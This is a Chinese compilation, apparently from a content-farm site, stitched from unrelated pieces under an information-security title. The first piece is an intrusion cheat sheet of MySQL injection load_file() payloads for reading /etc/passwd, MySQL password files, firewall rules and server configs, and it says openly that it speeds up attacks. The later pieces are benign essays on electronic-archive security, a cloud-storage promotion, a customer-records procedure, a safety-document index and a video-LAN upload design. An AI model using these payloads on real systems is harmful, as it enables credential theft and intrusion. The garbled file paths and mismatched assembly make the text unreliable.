信息安全管理体系文件(精选7篇)
1.信息安全管理体系文件 篇一
以下是大家针对MYSQL数据注入时用到的 load_file()函数对其文件查看的相关路径,合理的利用好,可以加快你的入侵速度.以下是本人入侵时收集起来.如果大家感觉这上面没有的路径.请继续在回复中接起来.一起分享.BY:孤狐浪子
1、 replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.
3、 load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
4、/etc tpd/conf tpd.conf或/usr/local/apche/conf tpd.conf 查看linux APACHE虚拟主机配置文件
5、c:Program FilesApache GroupApacheconf httpd.conf 或C:apacheconf httpd.conf查看WINDOWS系统apache文件
6、c:/Resin-3.0.14/conf/resin.conf查看jsp开发的网站 resin文件配置信息.
7、c:/Resin/conf/resin.conf/usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
8、d:APACHEApache2confhttpd.conf
9、C:Program Filesmysqlmy.ini
10、../themes/darkblue_orange/layout.inc.phpphpmyadmin 爆路径
11、 c:windowssystem32inetsrvMetaBase.xml 查看IIS的虚拟主机配置文件
12、 /usr/local/resin-3.0.22/conf/resin.conf针对3.0.22的RESIN配置文件查看
13、 /usr/local/resin-pro-3.0.22/conf/resin.conf 同上
14 、/usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE虚拟主机查看
15、 /etc/sysconfig/iptables 本看防火墙策略
16 、 usr/local/app/php5 b/php.iniPHP 的相当设置
17 、/etc/my.cnfMYSQL的配置文件
18、 /etc/redhat-release红帽子的系统版本
19 、C:mysqldatamysqluser.MYD 存在MYSQL系统中的用户密码
20、/etc/sysconfig/network-scripts/ifcfg-eth0 查看IP.
21、/usr/local/app/php5 b/php.ini //PHP相关设置
22、/usr/local/app/apache2/conf/extra tpd-vhosts.conf //虚拟网站设置
23、c:Program FilesRhinoSoft.comServ-UServUDaemon.ini
24、c:windowsmy.ini
2.信息安全管理体系文件 篇二
关键词:档案信息化,电子文件,信息安全
电子文件的安全与否直接关系到档案信息化的作用能否实现, 倘若电子文件安全保管不到位, 被非法窃取或者保存电子文件的载体或者格式遭到篡改, 由电子文件的数字信息特点可知, 生成于网络环境下的电子文件将无法保证其作为文件的真实性与准确性, 失去文件真实性的电子档案不仅使得档案机构花费大量人力物力的档案信息化工作无法得到实效, 同时也无法为企事业单位提供可靠的电子档案, 致使档案部门的工作和职能受到影响。这不仅提高不了档案工作的现代化水平, 而且电子文件的非安全利用还会为企事业单位的机密信息带来不小的威胁。因此保证电子文件的安全至关重要。
一、档案信息化环境下的电子文件信息安全风险
其一, 电子信息的储存和使用以配套的文档管理软件、硬件与操作系统为载体, 导致电子文件存储媒介的生命周期、计算机网络技术的急剧化发展引致的技术更新和淘汰、甚至储存格式的标准不一致都会威胁到电子文件信息的长期存取。如果被电子文件设法保存的信息却无法读出, 这在一定意义上等同于信息被毁坏。
其二, 从文件生命周期视角来看, 电子文件的整个生命运动过程都依赖计算机网络技术, 然而计算机网络自身的缺陷以及网络管理制度的不健全使其产生了诸多不安全因素, 这严重威胁到电子文件信息的真实性与完整性。
其三, 我国档案机构和人员信息安全管理意识和能力都相对薄弱, 非计算机专业人员无法准确安全的保护电子文件, 这样造成的成本与管理效率较低。电子文件信息安全也是整个档案信息化中的一个重要组成部分。因此, 对于档案信息化中电子文件信息安全的研究必须立足电子文件内部与外部的安全要求, 在此基础上, 充分认识电子文件信息安全的特殊性。
二、档案信息化中电子文件风险因素分析
1. 档案信息化中电子文件的载体的安全保护。
在电子文件安全保护中, 不得不提到, 电子文件赖以生存的载体, 与传统文件相比, 电子文件的出现使得新型载体材料得到人们的重视。
由于电子文件的存储载体种类多样, 性能不一, 针对电子文件保存的存储载体, 应该依据下列因素进行选择: (1) 优先选择符合标准的载体; (2) 使用有市场前景的载体, 构筑其软硬件的供应渠道不应受限; (3) 采用业界公认的性能稳定、耐久的载体; (4) 采用易维护的载体, 要易于确定载体对温湿度变化、污染物等的影响, 以有效实施维护; (5) 采用全生命周期成本较低的载体, 即获得、利用和更新载体以及配套的软硬件设备等一切成本综合起来应达到合理; (6) 选用易于检测其质变现象的载体, 及时探测到载体的微小变化, 以便在变化之初将储存的信息复制至新的载体。
针对档案形成过程可以参考以下载体选择方法: (1) 作为档案积累过程中的电子文件载体:无论对于何种文件产生过程, 在其存储和下载时都必须保存在载体上, 网络上传输的电子文件也更是如此。对于此类电子文件, 在归档前一段时间可存储于软磁盘或磁带, 或者存储在大容量的可擦写光盘上, 这对电子文件的利用和暂时保存而言既经济又方便。在网络上传输的电子文件其存储载体自然是硬磁盘。 (2) 作为档案保存的电子文件载体:如果电子文件应作为电子档案长期保存, 就应选取性能稳定、检索方便、显示还原容易的载体, 同时要衡量存储期限。针对大量的电子计算机辅助设计 (CAD) 、辅助制造 (CAM) 的产品, 可存储在一次写式光盘上;而针对办公自动化 (OA) 产生的电子档案, 可选择只读式和一次写式光盘或磁带, 软磁盘不能作为电子档案的载体;针对永久保存的特别珍贵的电子档案, 如建筑图纸、重要文献资料、有法律效力的凭证文件等, 则应转存在纸张或缩微品上, 因为要考虑到磁性载体和光盘的不稳定性及生命周期的不良影响。
2. 档案信息化中电子文件内容信息的安全保护。
(1) 自身因素。电子文件不稳定性使得电子文件不是像纸质文件一样固定在客观的实物上。在电子文件生成, 运转, 利用的过程中, 它的每次信息运动都要经过很多不确定性的因素影响, 而纸质文件一旦列入保护程序就会比较固定, 不确定性因素影响较少, 电子文件的不确定性造成的结果使得最初的文件格式, 形式等都发生了变化, 比较常见的便是电子文件可能读不出来, 以及因为信息系统环境的因素无法正确读出。另外, 值得一提的是由于电子文件具有易操作性, 它虽然在提供某些新数据以及更新信息上会带来比较大的便利, 但是如果监管和保护不规范或者出现非正常利用, 那么电子文件信息将遭受比较大的破坏, 使得电子文件内容信息出现较大的差别, 既破坏了开发利用又使得电子文件不被档案工作部门认可。电子文件依赖信息管理系统, 因为它的全过程管理都是在信息系统这一可靠条件下发生的, 离不开硬件软件环境的支持, 计算机系统在不断更新, 信息系统能否与之兼容, 以及兼容后出现的读取问题和利用问题, 这给档案信息化带来不小的挑战。 (2) 外部条件。电子文件和客观存在的事物一样, 会受到周围环境的影响, 由此可知, 保护电子文件必须联系当前情况, 下面将从几个与电子文件信息密切相关的外部环境来讨论电子文件信息的保护。虽然电子文件以代码的形式存储在计算机的硬盘上, 但是计算机是实体存在的;另外除了这种类型的电子文件, 以光盘或者磁盘为存储载体的电子文件, 受载体的客观形态限制, 会受环境的影响, 自然灾害如洪水、台风、咫风、泥石流、地震, 海啸、火山, 这些自然灾害会直接影响到电子文件载体的寿命和存在。另外, 由于电路老化以及馆藏环境的恶化也会直接导致电子文件的不可读。由于人为或者动物所为的灾害, 如火灾、水淋、虫灾也会对电子文件造成毁灭性打击。 (3) 机构管理疏漏。由于档案工作人员直接具有信息化后档案管理系统的密码以及口令, 维护电子文件安全, 应该从人员抓起, 定期更改口令, 对档案工作人员工作日志实行电子监管, 落实之职责, 严格规定各类档案工作人员的使用权限, 做到从内部杜绝档案信息外漏, 保护好电子文件的安全。
三、档案信息化中电子文件安全保护对策分析
电子文件安全问题范围广而大, 要做好电子文件的安全保护, 需要解决很多问题, 并形成制度化, 减少人为和自然灾害影响必须采取多种方式来综合管理, 比如密码技术、防火墙与入网检测系统、数字签名技术、计算机病毒防治、长期存储技术以及远程镜像磁盘等。同时, 电子文件安全保护需要档案管理人员思想的改变与及时更新, 所以电子文件安全保护可从四个方面拓展。
1. 定期进行档案人员电子文件保护专题培训。
电子文件的出现直接导致档案工作人员要及时跟上新的安全保护常识, 面对新情况, 新问题, 需要以全新的角度思考问题与对策, 定期进行档案人员电子文件保护专题培训或者与之相关的扩展训练, 在很大程度上, 对电子文件的安全问题有积极的作用。同时培养和加强档案管理人员的保密意识, 强化自身职业要求。
2. 改变重技术轻管理的电子文件信息安全保护策略。
现有的电子文件管理系统对电子文件信息安全和保密锁采取的措施大多是技术性的, 缺少充分的管理配套措施, 如生成文件登记、监控文件运行过程等。如果这些管理规范和策略缺位或不完全到位, 仅靠电子文件安全保护的技术方法是无法全面保障电子文件的信息安全的。所以, 做好电子文件信息安全保护不仅需要技术的提高还需具备更广更深的管理视角。需要档案工作人员发挥主观能动性对电子文件管理进行全过程研究与监控。仔细钻研业务内容, 在每一环节上做到思考全面。
3. 建立健全电子文件安全保护管理规范。
电子文件安全保护管理规范包含很多方面, 其中摆在首位便是岗位职责制, 有了岗位分工, 能有效避免职能错位, 无论对电子文件的查阅, 利用, 还是对它的安全管理来说, 都可以做到从源头上保证电子文件的使用权限, 从而也能有效避免电子文件遭受恶意破坏与利用。第二, 施行电子文件利用日志, 实时记录电子文件整个管理过程, 做到何时何地都确保利用文件的权限, 这样能及时跟踪电子文件, 做到“心中有数”。第三, 及时完善电子文件的背景信息, 也是做好电子文件安全的一项重要措施。通过背景信息, 可以通过计算机内容的磁盘记录来查看, 这样对电子文件管理情况则更加准确。
4. 健全电子文件安全保护的法律法规体系。
电子文件作为档案事业发展的新型管理对象, 安全问题是管理的重中之重。目前有《中华人民共和国计算机信息系统安全保护条例》、《计算机信息网络国际联网安全保护管理办法》、《网络安全法》、《中华人民共和国电子签名法》等, 这些虽然是基本性的原则法规, 并不完全适用于档案信息化中的电子文件安全保护, 但是可以提供参考作用, 所以, 档案工作人员必须结合本机构实际, 规划出适用的原则。这样才能最大程度的保护本单位电子文件的安全。
参考文献
[1]刘家真.数字记录与传统记录保护的比较研究[J].档案管理, 2001 (2) .
[2]刘家真.数字化载体的性能比较[J].中国档案, 2001 (3) .
[3]麻新纯.电子文件保护系统论[J].档案学研究, 2005 (4) .
3.信息安全管理体系文件 篇三
众所周知,文件管理是企业的工作核心,档案资料管理,知识共享以及任务管理或各种流程都与文件管理有着密切联系。相对于消息管理来说,文件管理是底层,比较重。因此,只有首先解决了企业内部文件的云化,才更利于其他各种移动应用与文件的对接,从而有效实现企业的移动办公。而“够快云库”正是这方面的专家。
那么什么是够快云库呢?它又是怎样一种创新技术呢?够快云库是一个基于云存储的文件共享与交流互动的平台。与传统网盘相比,够快云库为用户提供了无限可扩容的云存储空间,通过全球首创的“索引同步”技术,实现了对用户硬盘的零占用。简单来说,就是即使几百兆的文件也可以迅速地呈现在用户面前,并且够快云库支持文件离线操作,在没有网络的状况下,依旧可以对文件进行查看、编辑等操作。
据悉,够快云库在底层架构上依托的是阿里云。阿里云致力于打造公共、开放的云计算服务平台,并借助技术的创新,不断提升计算能力与规模效益,将云计算变成真正意义上的公共服务。而够快云库由阿里云提供安全稳定的Iaassaas服务,同时解决了国内互联互通的瓶颈,使其专注于上层的saas服务,更好的帮助企业进行信息化转型。如今,够快云库技术运用于各个行业,包括制造业、医疗卫生行业、设计行业、金融行业等。
值得一提的是,近日够快云库与微信企业号达成合作,真正实现了文件与消息的贯通,将为企业信息化转型与移动办公的全面推进带来巨大的影响。我们在上交会的现场也看到了两者结合的使用效果。通过实际的演示操作,可以看到,通过微信企业号,企业员工可以很方便地在微信界面上,收发文件消息、访问相关文件、查询企业资料库、展开成员间对文件的讨论、发送或共享文件以及上传本地手机里的照片与音视频文件,当然,这一切都是基于企业内部的组织架构与权限管理,而且还不占用手机的存储空间。
够快云库与微信结合,对企业员工来说也有两个非常显著的改变。一是学习成本大幅下降了,因为做为商务人士基本上人人都有智能手机,都有微信,都知道如何使用微信,再加上够快在用户体验上的出色表现,所以不需要有太多的学习成本,很快就会使用。二是无需安装专门的APP,直接就可以使用。因为对企业来说,实现云库与微信的对接是由企业的系统管理员来实现的,然后分配给各部门主管,由各部门主管完成人员添加与文件添加以及相关的授权。因此原则上普通工作人员不需要安装软件就可以按权限使用文件的基础管理功能,这就太方便了。
目前够快的混合云在业内取得了不错的口碑,据了解够快混合云存储模式,在云端方面依托阿里云云盾防护,有效抵御DDos等的攻击。在技术方面,除了以自主知识产权的索引同步技术,极大降低了文件传输时对企业带宽资源的消耗,和对本地磁盘的占用之外,旗下的混合云存储模式,即兼顾了公有云存储“费用低、免维护、易扩展“等优势,又保证了企业对文件自有存储的要求。就了解到的情况来看,虽然大背景下2014年整体云安全泄露事件频频发生,但够快云库这项技术通过自身产品的安全性以及多元化,获得了包括新东方、宜信、中国城市规划设计院在内的众多企业的认可,达到企业文件的网银级安全等级。
4.客户信息管理流程程序文件 篇四
1目的:本流程规范了客户信息收集的口径和管理方法,强调了从潜在客户分析到客户接触、客户开发、客户维护等全过程的客户信息管理。
2适用范围:适用于市场部专员进行客户信息的全程管理。
3定义:
3.1客户档案:用来收集客户从销售机会分析到销售接触直至最终签订合同并合作的全过程所收集的详细数据,内容包括客户的基本信息、销售人员的接触信息、销售执行情况等。具体内容参见《客户档案管理制度》。
4职责:
4.1总经理:指导并参与客户资质的评审。
4.2销售副总:参与客户资质的评审,提供专业化建议。
4.3销售部经理:负责贯彻公司战略,收集潜在客户信息;参与客户的开发工作和客户资质的评审。
4.4财务部经理:参与客户资质的评审,提供财务的分析支持。
4.5销售部业务员:参与客户开发工作;负责日常的渠道维护工作,并在工作过程中注意收集客户的经营情况。
4.6销售部内勤:通过对销售订单的管理明确客户日常经营信息。
4.7市场部专员:利用各方面收集上来的信息收集完善客户档案,进行整理归档工作。5内容:
5.1收集潜在客户信息:销售部业务人员在客户开发的过程中收集潜在客户的信息,包括客户的基本资料、客户的基本经营情况、客户的财务状况等,相关信息在客户档案中收集。
5.2客户开发:在明确客户意向的基础上进行更深一步的接触,而开发中涉及的信息也在客户档案中反映。
5.3填写客户档案:销售部业务人员依据销售过程中收集到的情况填写客户档案中的客户信息卡。
5.4客户资质评级:具体工作请参照《客户资质管理流程》。
5.5收集客户日常经营信息:在建立了同客户之间的合作关系后,销售部的内勤需要按月收集客户的经营信息,以销售统计报表的方式归集信息。
5.6收集客户日常回款信息:财务部定期收集客户的回款信息,评估客户的资信状况。
5.7填写客户档案:市场部专员在销售全过程利用从各个阶段收集来的信息进行客户档案的维护。
5.8收集归档:市场部专员将客户档案进行收集归档,以备其他部门查阅,同时也保证信息的统一管理。
6记录:
6.1客户档案
7有关文件:
7.1客户资质管理流程
5.安全管理文件目录 篇五
一、安全规程.........................1二、预案准备文件...............................1三、事故调查规范...............................2四、标准化管理............................2(一)电力标准..............................2
(二)水利标准..............................3①部属水利...........................3
②农村水电...........................3
五、劳动保护(职业病危害)管理........................4六、政府文件.........................5七、单位制度.........................5八、精细化管理............................5九、其它..........................6
十、安全文化.........................6
一、安全规程
1.(1)国家电网公司电力安全工作规程电气部分(2008)
2.(2)国家电网公司电力安全工作规程水动部分(2008)
3.(3)机电前四总合安规
4.(4)电气安全规程100题
5.(5)机械安规100题
6.(6)检修运行安全知识题目
7.(7)基本安全常识
8.(8)电业安全工作规程第1部分:热力和机械(GB 26164.1-2010)
9.(9)电力安全工作规程发电厂和变电站电气部分(GB 26860-2011)
二、预案准备文件
10.(1)生产经营单位安全生产事故应急预案编制导则(AQ/T9002-2006)
11.(2)生产安全事故应急预案管理办法(总局令17号2009.5.1)
12.(3)重大危险源辨识(GB18218,2001.4.1)
13.(4)湖南省人民政府突发公共事件总体应急预案
14.(5)湖南省安全生产事故灾难应急预案
三、事故调查规范
15.(1)生产安全事故报告和调查处理条例(国务院令599号2007.6.1)
16.(2)《生产安全事故报告和调查处理条例》释义
17.(3)《生产安全事故报告和调查处理条例》罚款处罚暂行规定(总局令42号2011.9.1)
18.(4)[参考]电力生产事故调查规程(2005.4.1国网公司)
19.(5)[参考]国电公司电业生产事故调查规程(2000)
20.(6)电力安全事故应急处置和调查处理条例(国务院令599号2011.9.1)
21.(7)[参考]中国大唐集团公司电力生产安全事故调查规程
四、标准化管理
22.安全生产标准化建设的一般知识
23.(1)企业安全生产标准化基本规范(AQ/T9006-2010)
24.(2)安全标志及其使用导则(GB 2894-2008)
25.(3)安全标志使用导则(并入GB-2894)
26.(4)图形符号 箭头及其应用(GB-T1252-1989)
27.(5)图形标志 使用原则与要求(GB-T15566-1995)
28.(6)工作场所职业病危害警示标识(D31-GBZ158-2003,2003.12.1)
29.(7)安全生产隐患排查治理暂行规定(国安监总局16号令2008.2.1)
30.(8)国务院安委会关于深入开展企业安全生产标准化建设的指导意见(国安委[2011]4号,2011.5.3)
(一)电力标准
31.(1)电力行业标准化管理办法(1999.9.16)
32.(2)电力行业标准化建设指导意见
33.(3)办安全83:关于印发《电力安全生产标准化达标评级实施细则(试
行)》的通知(2011.9)
34.(4)电监安全21号:关于深入开展电力安全生产标准化工作的指导意见(2011)
35.(5)电监安全23号:关于印发《发电企业安全生产标准化规范及达标评级标准》的通知(2011.8)
36.(6)电监安全28号:关于印发《电力安全生产标准化达标评级管理办法(试行)》的通知(2011.9)
(二)水利标准
①部属水利
37.水安监[2011]346号:水利行业开展安全生产标准化建设实施方案(2011.7.4)
38.(1)水安监[2013]189号:水利安全生产标准化评审管理暂行办法(2013.4.10)
39.(2)水利安全生产标准化评审管理暂行办法实施细则
40.(3)(附件1)水利工程项目法人安全生产标准化评审标准(试行)
41.(4)(附件2)水利水电施工企业安全生产标准化评审标准(试行)
42.(5)(附件3)水利工程管理单位安全生产标准化评审标准(试行)
43.(6)(附件4)水利安全生产标准化自评报告(格式)
44.(7)(附件5)水利安全生产标准化评审申请表
45.(8)(附件6)水利安全生产标准化评审报告(格式)
②农村水电
46.(9)农村水电站安全生产标准化达标评级实施办法(暂行)(2013.9.28)
47.(10)[作废]农村水电站安全管理分类及年检办法(2006)
48.(11)(附件1)农村水电站安全生产标准化评审标准(暂行)
49.(12)(附件2)农村水电站安全生产标准化自评报告(格式)
50.(13)(附件3)农村水电站安全生产标准化评审申请表
51.(14)(附件4)农村水电站安全生产标准化评审报告(格式)
52.(15)(附件5)农村水电站安全生产标准化证书(式样)
53.(16)(附件6)农村水电站安全生产标准化牌匾(式样)
54.(17)农村水电站安全生产标准化评审流程图
55.(18)农村水电站岗位设置及定员标准(2003.12)
五、劳动保护(职业病危害)管理
56.(1)中华人民共和国劳动法(1994主席令28号1995.1.1,2009.8.27修订)
57.(2)中华人民共和国劳动合同法(2007人常会2008.1.1,2012.12.28修订2013.7.1)
58.(2,1)中华人民共和国劳动合同法实施条例(国务院令535号2008.9.18)
59.(2,2)中华人民共和国劳动争议调解仲裁法(主席令80号2008.5.1)
60.(3-1)个体防护装备选用规范(GB/T11651-2008,2009.10.1)
61.(3)[替代]劳动防护用品选用规则(GB/T11651-1989)
62.(4)劳动防护用品监督管理规定(2005总局令1号2005.9.1)
63.(5)湖南省一般劳动防护用品生产和劳动防护用品经营备案管理办法(2006.6)
64.[作废]作业场所职业健康监督管理暂行规定(总局令23号2009.10.1)
65.[作废]企业职工奖惩条例(1982.4.1)
66.(6)(安总局36号)建设项目安全设施“三同时”监督管理暂行办法(2011.2.1)
67.(7)(安总局47号)工作场所职业卫生监督管理规定(2012.6.1)
68.(8)(安总局48号)职业病危害申报办法(2012.6.1)
69.(9)(安总局49号)用人单位职业健康监护监督管理办法(2012.6.1)
70.(10)(安总局50号)职业卫生技术服务机构监督管理暂行办法(2012.7.1)
71.(11)(安总局51号)建设项目职业卫生“三同时”监督管理暂行办法(2012.6.1)
72.(12)职业健康监护技术规范GBZ118-2007(2007.10.1)
73.(13)中华人民共和国职业病防治法(2001人常会2002.5.1,2011.12.3174.(14)职业病目录
75.(15)职业病危害因素分类目录(2010)
76.(16)特种作业人员安全技术培训考核管理规定(总局令30号2010.7.1)
77.(17)工伤保险条例(国务院令375号2004.1.1,2010.12.20修订)
78.(18)工伤赔偿标准(2012)
79.(19)湖南省实施工伤保险条例办法(2004.4.1废止,2014.4.1)
六、政府文件
80.(1)三文一条例摘录合编(2010)
81.(2)国务院关于进一步加强企业安全生产工作的通知(2010)
82.(3)国务院关于坚持科学发展安全发展促进安全生产形势持续稳定好转的意见(2011)
83.(4)湖南省人民政府关于进一步加强企业安全生产工作的实施意见(2010)
84.(5)湘潭市落实生产经营单位安全生产主体责任暂行规定(2010)
85.(6)湘潭市安全生产监督管理职责暂行规定(2010)
86.(7)湖南省安全生产条例(2010)
87.(8)湖南省党政领导干部安全生产“一岗双责”暂行规定(2013.2.1)
88.(9)关于印发《企业安全生产费用提取和使用管理办法》的通知(财企
[2012]16号)
七、单位制度
89.目录
八、精细化管理
90.精细化管理
91.企业精细化管理论文:浅析企业精细化管理
92.(1)“国家标准”相关知识
93.(2)关于印发中小企业划型标准规定的通知(工信部联企业[2011]300号2011.6.18)
94.(3)安全法修正稿201
495.(4)刑法(危害公共安全罪)
96.(5)国务院关于废止部分行政法规的决定(国务院2008第516号令)
97.(6)国务院关于国家行政机关和企业事业单位社会团体印章管理的规定(国发[1995]25号)
98.(7)如何应对《企业职工奖惩条例》的废止(2008)
99.(8)安全知识小读本(2014)
十、安全文化
100.安全文化的基本知识
101.企业安全文化的内容
102.企业安全文化的涵义及功能
103.企业安全文化建设包括哪些方面
104.浅议企业安全文化建设的意义和途径
105.中国安全文化诞生的历史背景
106.以安全文化力提升企业安全管理水平
107.从杜邦公司看安全文化
108.杜邦安全文化理论
6.电子文件安全管理浅论 篇六
所谓电子文件是在指人们在社会活动中形成的,以计算机盘片、磁盘和光盘等化学磁性材料为载体的文字材料。与传统的纸质文件相比较,电子文件有以下特点:
1)电子文件不再是直观的纸质文件,对现代化办公设备的依赖性很高,必须借助于计算机等设备才能阅读利用;
2)电子文件可以直接由计算机等现代办公设备迅速地处理和传递,可共享,也不再受时间和距离的限制;
3)电子文件的保存条件和环境要求与纸质档案不同,对场地要求不高,但对环境的温湿度、防灰和防磁性的要求很高[1]。
2 电子文件的鉴定
对电子文件的鉴定是我们需要加以着重考虑的问题。由于电子文件的保存价值同时取决于其自身价值和可读性,其鉴定的方法、内容、标准均发生变化。因此,档案工作人员在电子文件归档前,一要认真进行鉴定,区分文件价值,只有对本单位工作具有查考利用价值的,才有必要进行归档;二是由于部分电子文件保持期限较长,其读取软件的操作系统可能随着时间的推移不再具有兼容性,因此,同时定期要将有关电子文件的读取软件和操作系统同步归档。
电子文件的真伪鉴别一直是文件管理和档案技术的难点。档案部门所保管的电子档案,应该是文件的原件或真实的电子文件;否则,电子档案就失去了凭证价值[2]。文件制发单位必须将电子文件的原件归档,以保证电子文件的原始性,以维护电子文件的凭证性和依据性。档案部门应将电子文件的隐形条码与该文件一同归档,以维护电子文件的权威性,并作为电子文件原始性、凭证性和依据性的基础。归档的电子文件复制件应注明原制发单位和复制人,使之与原件相区别。此外,还应对电子文件的完整性进行鉴定。主要包括电子文件内容的完整性、文件制发法律手续的完整性、法律依据的完整性、文件办理过程的完整性等等。
由于电子文件进入网络运行后,其复制是极为便利的。同时也不能排除个别别有用心者对文件或档案进行篡改。这样,我们必须认真考虑电子文件的真假识别问题。对此问题,电子文件制发单位可在机内输入隐形条码,使之与伪造或复制件相区别。当网上用户使用任何一份文件时,他只知道该文件内容,而无法知道该文件条码。同样,只有具备隐形条码的电子文件才是原件,才能作为凭证或者依据使用。
3 具体措施
3.1 改革电子文件存储方式
目前涉密电子文件的存储方式还是以分散存储为主,每个终端都存有电子文件。一旦某个终端出现问题,不仅这个终端本身存储的电子文件要受到损失,而且还可能使其所在的局域网甚至广域网上所有终端都受到攻击和破坏。要对其存储方式进行改革,有三种存储方式可以选择:一是无盘工作站方式。各终端不配置硬盘,电子文件以及处理电子文件所需的应用软件全部存储在服务器中。二是无密工作站方式。各终端配置硬盘,但不存储涉密电子文件,涉密电子文件全部存储在服务器中。三是移动插拔方式。涉密电子文件存储在移动硬盘、优盘等移动式存储器上。用户处理电子文件时,将移动式存储器插入微机,不处理电子文件时,将移动式存储器拔下,锁入保密柜保存。
3.2 完善网络系统防护措施
涉密网络系统防护必须一手抓技术,一手抓管理,技术上多种手段设防,管理上多种措施并用,实行综合治理。尤其应着重抓好"一个隔离,两层认证,三种能力"。一个隔离,就是内部涉密网必须与外部网实行物理隔离,禁止与国际互联网进行任何直接或间接的物理连接。两层认证,一是每个终端必须设置开机密码,通过密码认证用户是否有权使用该终端。二是用户进入终端后,应进行身份认证,以确认用户是否有权通过网络系统处理电子文件。三种能力,一是病毒防护能力。所有服务器和终端,都应安装正版杀毒软件,对计算机系统实时进行扫描和检测,防止计算机病毒进入网络系统。二是预警监测能力。实时寻找具有网络攻击特征和违反网络安全策略的操作行为,实时报警,阻断非法的网络连接。三是应急处置能力。制定应急方案,完善应急机制,建立应急分队,提高预警反击和灾难恢复能力,确保网络系统持续安全稳定运行。
3.3 精简电子文件数量
由于缺乏有效的管控机制,网络用户随意制发和复制涉密电子文件的现象较为严重,致使涉密电子文件数量己远远超出实际工作需要。为此,在满足正常工作需要的前提下,必须对涉密电子文件数量实施有效控制[3]。一是要严格审批把关。用户制发和复制涉密电子文件,必须按规定逐级报批,未经批准,不得擅自制发或复制涉密电子文件。二是强化技术手段。对涉密电子文件的下载、复制进行技术控制,切实做到未经审批和不具权限的用户,无法下载或复制涉密电子文件。三是定期鉴定清理。至少每半年要对电子文件进行一次鉴定,有留存价值的,及时移交档案部门归档保存;不具留存价值的,及时进行清删,防止失去现实作用的涉密电子文件留存在系统中。
3.4 控制电子文件使用权限
虽然电子文件的资源共享是实现办公自动化最关键的要素之一,但是从国家秘密安全的角度出发,网络中的涉密电子文件决不应该让所有用户都可以随意访问,需要对网络中的用户权限进行控制。控制用户权限的方法有:一是在网络层上设置允许用户访问服务器或终端的IP地址,不允许访问的用户根本无法连接成功。二是将涉密电子文件存放到指定的网络区域内,该网络区域只对有使用权限的用户开放,无权用户无法进入。三是通过数据列表方式,对每个用户使用涉密电子文件的权限事先做出限定,不具权限的用户无法进入或使用涉密电子文件管理系统。四是对涉密电子文件本身进行加密处理,将密码分配给有权限的用户,无权用户无法打开涉密电子文件。
4 电子文件的利用
电子文件管理工作的根本目的在于利用,首先必须建立起一整套科学、严谨、合理的电子文件管理制度,实现电子文件管理的标准化和规范化,使电子文件在产生、运行、管理过程中有法可依,有章可循,保障其工作顺利开展;其次,要把好数据库质量关。在数据管理方面应建立健全数据质量管理体系,根据本单位的实际情况,制定严格的数据质量考核指标,责任到人,并定期检查,常抓不懈;三是做到馆室共建,应将计算机录入工作分散到该立档单位的内设机构。由内设机构负责归档文件的计算机录入,档案室在接收归档文件的同时接收电子目录,并奖其合并为本单位的档案目录数据库,同时将重要的文件原文扫描,进而向档案馆移交电子目录,形成档案馆的电子档案目录中心。对于档案馆来说,其主要是负责对各立档单位电子档案目录库的形成、积累、保管、整理的指导和监督;接收和转换各档案室移交的电子档案目录,形成目录数据库;四是充分利用信息安全技术,切实保障档案信息数据库的安全,如配置防病毒卡和查杀系统并且要不断升级;设置密码、密钥、防火墙、身份验证、防写保护等等,确保电子文件的安全。
参考文献
[1]石剑文.电子文件管理应注意的问题[J].重庆科技学院学报:社会科学版,2007(5):206-207.
[2]翟贾远.对电子文件管理中几个问题的认识[J].档案管理,2007(4):58.
7.信息安全管理体系文件 篇七
关键词:非线性编辑局域网;文件上传:病毒
由于非编网的数据传输主要是视频、音频数据及图文数据,不需要也不允许用户私自安装其他的软件。而且每个客户端都禁用光驱。整个网络始终处于全封闭状态,未连到外网。几乎所有视频、音频数据都是通过SONY的数字编缉机的数字视频、音频输出接口进入非编网。如果不考虑其他渠道素材的连入,非线性编缉网等同于某种意义上与世隔绝的局域网。假设内部不存在人为的恶意攻击,那将是非常安全的。但当今世界视频、音频制作,离不开其他先进的媒体制作技术和来自各方面的视频、音频素材。这些素材主要是通过U盘跟移动硬盘接八的,它们的接入必定会导致大量的病毒跟随U盘和移动硬盘内的数据一同进入非编网,而用户一不小心就会激活它们。
1多媒体文件安全上传的新设想
病毒传染方式一般有两种方式:病毒被用户激活后,病毒程序立马被执行,并驻留内存,继而设置触发条件,进行传播:病毒可以通过INTERNET网络和系统漏洞直接攻击远程计算机,并将病毒本身植入到远程计算机系统中进行传播。在分析了传统的防病毒方法后,结合我们的实际情况,我们总结出以下几个方案:限制使用人员使用WINDOWSXP自带的资源管理器,防止用户激活病毒的原文件:在非编网中增加一台专用的移动存储设备接人工作站;除了允许专用的移动存储设备接人工作站外,禁止移动存储设备在所有客户端接入;在工作站正常运行的前提下,尽可能地限制使用人员的系统管理权限;在文件上传工作站旁增加一台连接INTER-NET的杀毒工作站,此工作站与非编网不相连。
2系统的总体构想
程序设计的第一步是明确程序的目的和如何使用,弄清用户对开发应用系统的确切要求。也就是说需要程序解决哪些问题,明确目的之后,才可以确定您需要创建哪些主题以及每个主题的功能。我们根据非编网目前存在的问题,分析一下设计程序的整体结构与功能。考虑到不改变网络整体布局,以及制作人员的操作方便需要,我们尝试在人员相对比较集中的大制作室内增加一台工作站,命名为“移动存储设备接入工作站”(简写“COPYFlLE”),同时在该工作站旁增加一台杀毒工作站。杀毒工作站安装的是最新的杀毒软件,并与INTERNET相连,它的基本用途有以下几点:实时升级更新WlNDOWSXP操作系统的系统补丁与杀毒软件的病毒库;对移动存储设备进行全面的病毒查杀;在上面可以进行简单的文件操作,包括文件的编辑与复制等,在里面把"DOC"或其他格式的文字文件转化为“TXT”的文本文件:把需要上传到非编网的视频、音频文件及文本文件等进行整理,并放到指定文件夹内(目标盘的WZTV目录下)。
COPYFILE工作站安装的也是最新的杀毒软件,但必须跟杀毒工作站的杀毒软件不属于同一牌子,这点很重要。除此之外,我们还要做的是设计一个具有文件上传和安全管理功能的软件,也就是我们现在要设计实现的“非线性编辑局域网文件安全上传管理系统”。
3系统的主要功能
经设计优化后的非编网具备的几大功能:
